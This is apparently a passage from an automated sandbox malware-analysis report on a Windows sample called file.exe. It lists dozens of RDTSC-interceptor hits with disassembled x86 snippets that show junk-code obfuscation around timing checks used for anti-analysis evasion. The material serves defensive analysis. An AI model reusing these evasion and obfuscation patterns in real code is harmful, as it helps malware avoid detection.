0x0000006e jmp 00007F3B605222D6h 0x00000073 mov ecx, dword ptr [ebp+08h] 0x00000076 push eax 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b popad 0x0000007c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50305F8 second address: 5030615 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030615 second address: 5030662 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, ecx 0x0000000b pushad 0x0000000c movzx eax, dx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F3B605222CFh 0x00000017 and eax, 5003018Eh 0x0000001d jmp 00007F3B605222D9h 0x00000022 popfd 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020010 second address: 5020016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020016 second address: 50200CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3B605222CCh 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F3B605222CBh 0x0000000f and eax, 6F96FBCEh 0x00000015 jmp 00007F3B605222D9h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e xchg eax, ebp 0x0000001f pushad 0x00000020 mov bx, cx 0x00000023 jmp 00007F3B605222D8h 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F3B605222D1h 0x00000031 xor si, 7966h 0x00000036 jmp 00007F3B605222D1h 0x0000003b popfd 0x0000003c call 00007F3B605222D0h 0x00000041 mov esi, 167BA0A1h 0x00000046 pop eax 0x00000047 popad 0x00000048 xchg eax, ebp 0x00000049 jmp 00007F3B605222CDh 0x0000004e mov ebp, esp 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 movsx edx, ax 0x00000056 mov edx, ecx 0x00000058 popad 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50200CE second address: 50200EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3B60BFE527h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50200EA second address: 502011D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 sub esp, 2Ch 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F3B605222D2h 0x00000011 add ecx, 2A5130F8h 0x00000017 jmp 00007F3B605222CBh 0x0000001c popfd 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502011D second address: 502018E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F3B60BFE524h 0x0000000a or cx, 8B58h 0x0000000f jmp 00007F3B60BFE51Bh 0x00000014 popfd 0x00000015 popad 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 jmp 00007F3B60BFE526h 0x0000001d push eax 0x0000001e jmp 00007F3B60BFE51Bh 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov edi, 348641A6h 0x0000002c call 00007F3B60BFE527h 0x00000031 pop eax 0x00000032 popad 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502018E second address: 50201A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B605222D5h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50201E0 second address: 50201E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50201E4 second address: 50201EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50201EA second address: 502027C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3B60BFE51Ch 0x00000009 xor ah, 00000038h 0x0000000c jmp 00007F3B60BFE51Bh 0x00000011 popfd 0x00000012 mov ax, A16Fh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 sub ebx, ebx 0x0000001b pushad 0x0000001c mov cx, dx 0x0000001f mov ebx, 44847A80h 0x00000024 popad 0x00000025 mov edi, 00000000h 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F3B60BFE522h 0x00000031 sub si, 18C8h 0x00000036 jmp 00007F3B60BFE51Bh 0x0000003b popfd 0x0000003c mov eax, 671BDE3Fh 0x00000041 popad 0x00000042 inc ebx 0x00000043 pushad 0x00000044 mov ch, 56h 0x00000046 mov si, bx 0x00000049 popad 0x0000004a test al, al 0x0000004c jmp 00007F3B60BFE51Fh 0x00000051 je 00007F3B60BFE6FDh 0x00000057 pushad 0x00000058 movzx ecx, bx 0x0000005b mov cl, bl 0x0000005d popad 0x0000005e lea ecx, dword ptr [ebp-14h] 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 mov ax, 952Bh 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50202D5 second address: 50202DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50202DB second address: 50202DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50202DF second address: 50202E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50203CF second address: 50203D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50203D3 second address: 50203F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50203F0 second address: 50204D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3B60BFE527h 0x00000009 jmp 00007F3B60BFE523h 0x0000000e popfd 0x0000000f call 00007F3B60BFE528h 0x00000014 pop esi 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jne 00007F3BD253C576h 0x0000001e jmp 00007F3B60BFE521h 0x00000023 mov ebx, dword ptr [ebp+08h] 0x00000026 jmp 00007F3B60BFE51Eh 0x0000002b lea eax, dword ptr [ebp-2Ch] 0x0000002e jmp 00007F3B60BFE520h 0x00000033 xchg eax, esi 0x00000034 jmp 00007F3B60BFE520h 0x00000039 push eax 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F3B60BFE521h 0x00000041 adc eax, 3D78A686h 0x00000047 jmp 00007F3B60BFE521h 0x0000004c popfd 0x0000004d mov di, cx 0x00000050 popad 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F3B60BFE529h 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50204D3 second address: 50204D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50204D9 second address: 50204DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50204DD second address: 5020524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d jmp 00007F3B605222D4h 0x00000012 mov dh, cl 0x00000014 popad 0x00000015 push eax 0x00000016 jmp 00007F3B605222CCh 0x0000001b nop 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f mov ax, 5873h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020524 second address: 502055D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F3B60BFE524h 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e popad 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3B60BFE526h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502055D second address: 502056C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502056C second address: 50205C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F3B60BFE523h 0x00000015 or cx, 15FEh 0x0000001a jmp 00007F3B60BFE529h 0x0000001f popfd 0x00000020 movzx ecx, di 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50205C6 second address: 50205E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B605222D9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50205FB second address: 5020601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020601 second address: 5020605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020605 second address: 5010EE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, eax 0x0000000d jmp 00007F3B60BFE51Eh 0x00000012 test esi, esi 0x00000014 jmp 00007F3B60BFE520h 0x00000019 je 00007F3BD253C525h 0x0000001f xor eax, eax 0x00000021 jmp 00007F3B60BD7C4Ah 0x00000026 pop esi 0x00000027 pop edi 0x00000028 pop ebx 0x00000029 leave 0x0000002a retn 0004h 0x0000002d nop 0x0000002e cmp eax, 00000000h 0x00000031 setne cl 0x00000034 xor ebx, ebx 0x00000036 test cl, 00000001h 0x00000039 jne 00007F3B60BFE517h 0x0000003b jmp 00007F3B60BFE688h 0x00000040 call 00007F3B65A4A637h 0x00000045 mov edi, edi 0x00000047 jmp 00007F3B60BFE520h 0x0000004c xchg eax, ebp 0x0000004d pushad 0x0000004e mov bh, ah 0x00000050 pushad 0x00000051 push edi 0x00000052 pop esi 0x00000053 mov dl, 65h 0x00000055 popad 0x00000056 popad 0x00000057 push eax 0x00000058 jmp 00007F3B60BFE527h 0x0000005d xchg eax, ebp 0x0000005e jmp 00007F3B60BFE526h 0x00000063 mov ebp, esp 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F3B60BFE527h 0x0000006c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010EE6 second address: 5010F4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov ax, D7C7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e pushad 0x0000000f movzx esi, dx 0x00000012 mov di, 9478h 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 call 00007F3B605222CCh 0x0000001e call 00007F3B605222D2h 0x00000023 pop ecx 0x00000024 pop edx 0x00000025 push ecx 0x00000026 pushad 0x00000027 popad 0x00000028 pop edx 0x00000029 popad 0x0000002a xchg eax, ecx 0x0000002b jmp 00007F3B605222D8h 0x00000030 mov dword ptr [ebp-04h], 55534552h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010F4A second address: 5010F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010F4E second address: 5010F52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010F52 second address: 5010F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010F58 second address: 5010F67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B605222CBh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010F67 second address: 5010F6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020BCB second address: 5020BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020BD1 second address: 5020C26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE523h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ebx, esi 0x0000000f mov ax, 0547h 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 mov dx, 825Eh 0x0000001a mov di, 666Ah 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 mov edx, 15ED58C2h 0x00000026 mov ax, dx 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F3B60BFE527h 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020C26 second address: 5020C2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020C2C second address: 5020C3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B60BFE51Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020C3B second address: 5020C5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [769B459Ch], 05h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3B605222D0h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020C5C second address: 5020C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020C62 second address: 5020C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020C66 second address: 5020CAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE51Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F3BD252C29Ch 0x00000011 pushad 0x00000012 movzx esi, dx 0x00000015 mov si, di 0x00000018 popad 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F3B60BFE51Ch 0x00000023 sub si, 6578h 0x00000028 jmp 00007F3B60BFE51Bh 0x0000002d popfd 0x0000002e mov eax, 70E6F4AFh 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020D11 second address: 5020D17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020D17 second address: 5020D7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE523h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F3B60BFE529h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007F3B60BFE521h 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d mov ecx, edx 0x0000001f mov bx, 72BEh 0x00000023 popad 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F3B60BFE51Bh 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020D7A second address: 5020DE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F3B605222CEh 0x0000000f call 00007F3BD1E57092h 0x00000014 push 76952B70h 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov eax, dword ptr [esp+10h] 0x00000024 mov dword ptr [esp+10h], ebp 0x00000028 lea ebp, dword ptr [esp+10h] 0x0000002c sub esp, eax 0x0000002e push ebx 0x0000002f push esi 0x00000030 push edi 0x00000031 mov eax, dword ptr [769B4538h] 0x00000036 xor dword ptr [ebp-04h], eax 0x00000039 xor eax, ebp 0x0000003b push eax 0x0000003c mov dword ptr [ebp-18h], esp 0x0000003f push dword ptr [ebp-08h] 0x00000042 mov eax, dword ptr [ebp-04h] 0x00000045 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000004c mov dword ptr [ebp-08h], eax 0x0000004f lea eax, dword ptr [ebp-10h] 0x00000052 mov dword ptr fs:[00000000h], eax 0x00000058 ret 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c pushad 0x0000005d popad 0x0000005e pushfd 0x0000005f jmp 00007F3B605222D3h 0x00000064 adc cl, 0000002Eh 0x00000067 jmp 00007F3B605222D9h 0x0000006c popfd 0x0000006d popad 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020DE2 second address: 5020E2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 pushfd 0x00000007 jmp 00007F3B60BFE523h 0x0000000c and ax, 683Eh 0x00000011 jmp 00007F3B60BFE529h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a sub esi, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F3B60BFE51Ah 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50309D3 second address: 50309DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dl 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50309DA second address: 5030A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 mov esi, ebx 0x0000000b mov bx, 5566h 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3B60BFE528h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030A05 second address: 5030A95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3B605222D1h 0x00000009 and cx, 2576h 0x0000000e jmp 00007F3B605222D1h 0x00000013 popfd 0x00000014 mov ecx, 24F0CC67h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e jmp 00007F3B605222CAh 0x00000023 xchg eax, esi 0x00000024 pushad 0x00000025 call 00007F3B605222CEh 0x0000002a mov bh, cl 0x0000002c pop edi 0x0000002d push ecx 0x0000002e pushfd 0x0000002f jmp 00007F3B605222D3h 0x00000034 add ax, 180Eh 0x00000039 jmp 00007F3B605222D9h 0x0000003e popfd 0x0000003f pop ecx 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030A95 second address: 5030A99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030A99 second address: 5030A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030A9F second address: 5030AE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE522h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F3B60BFE520h 0x0000000f mov esi, dword ptr [ebp+0Ch] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3B60BFE527h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030AE2 second address: 5030AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B605222D4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030AFA second address: 5030B0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov edx, 03ABAD8Eh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030B0C second address: 5030B22 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 5539149Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a je 00007F3BD1E3FB67h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov di, ax 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030B22 second address: 5030B87 instructions: 0x00000000 rdtsc 0x00000002 mov cl, D3h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F3B60BFE521h 0x0000000c add ecx, 5FFB89C6h 0x00000012 jmp 00007F3B60BFE521h 0x00000017 popfd 0x00000018 popad 0x00000019 cmp dword ptr [769B459Ch], 05h 0x00000020 jmp 00007F3B60BFE51Eh 0x00000025 je 00007F3BD2533E45h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F3B60BFE527h 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030B87 second address: 5030BAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030BAB second address: 5030BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030BB1 second address: 5030BB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030BB6 second address: 5030BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030BBC second address: 5030BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030BC8 second address: 5030BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop esi 0x00000006 popad 0x00000007 movsx ebx, ax 0x0000000a popad 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edi, ax 0x00000012 movzx eax, dx 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030CCF second address: 5030CD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6333F76 second address: 6333F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633302E second address: 6333039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3B605222C6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6333039 second address: 633306C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE524h 0x00000007 pushad 0x00000008 jne 00007F3B60BFE516h 0x0000000e jmp 00007F3B60BFE524h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63331E9 second address: 63331FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B605222CDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63331FA second address: 6333200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6333652 second address: 6333658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6333658 second address: 6333662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6333662 second address: 6333668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63337C3 second address: 63337DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B60BFE522h 0x00000009 popad 0x0000000a rdtsc
